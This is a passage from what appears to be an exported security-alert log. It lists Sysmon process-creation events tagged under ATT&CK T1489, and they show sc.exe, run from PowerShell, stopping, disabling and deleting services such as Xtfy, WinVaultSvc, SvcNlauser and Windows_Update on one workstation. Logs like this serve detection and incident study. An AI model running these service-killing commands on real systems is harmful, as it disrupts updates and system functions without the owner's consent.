0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.089"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010c8332100}"",""processId"":""1988"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.293",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.057 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001000332100} +ProcessId: 3152 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.062306900Z"",""eventRecordID"":""2701"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.057\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001000332100}\r\nProcessId: 3152\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.057"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001000332100}"",""processId"":""3152"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.245",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.996 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-001033302100} +ProcessId: 6200 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.000018600Z"",""eventRecordID"":""2698"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.996\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-001033302100}\r\nProcessId: 6200\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.996"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-001033302100}"",""processId"":""6200"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.197",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.935 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010552d2100} +ProcessId: 7660 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.937028500Z"",""eventRecordID"":""2695"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.935\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010552d2100}\r\nProcessId: 7660\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.935"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010552d2100}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.183",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.919 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c2c2100} +ProcessId: 6192 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SvcNlauser Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SvcNlauser Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.921665300Z"",""eventRecordID"":""2694"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.919\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c2c2100}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SvcNlauser Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.919"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00108c2c2100}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SvcNlauser Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.151",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.892 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fe2a2100} +ProcessId: 1820 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.894248200Z"",""eventRecordID"":""2692"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.892\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010fe2a2100}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.892"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010fe2a2100}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.109",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.851 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a7282100} +ProcessId: 6324 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.853612100Z"",""eventRecordID"":""2689"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.851\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a7282100}\r\nProcessId: 6324\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.851"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010a7282100}"",""processId"":""6324"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 